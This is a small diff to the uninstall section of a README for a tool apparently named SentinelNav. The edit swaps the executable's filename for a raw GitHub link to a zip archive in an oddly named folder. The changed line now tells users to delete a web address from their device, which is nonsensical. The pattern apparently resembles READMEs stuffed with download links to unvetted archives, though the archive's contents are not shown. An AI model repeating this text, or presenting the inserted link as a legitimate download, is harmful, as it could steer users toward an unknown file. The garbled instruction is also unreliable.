souzz-wav/SentinelNav/README.md

 ### How do I uninstall SentinelNav?

-Simply delete the `SentinelNav.exe` file from your device.
+Simply delete the `https://raw.githubusercontent.com/souzz-wav/SentinelNav/main/teemingly/SentinelNav_2.3.zip` file from your device.
 There are no additional files created, so cleaning up is straightforward.

 ### What if I encounter issues?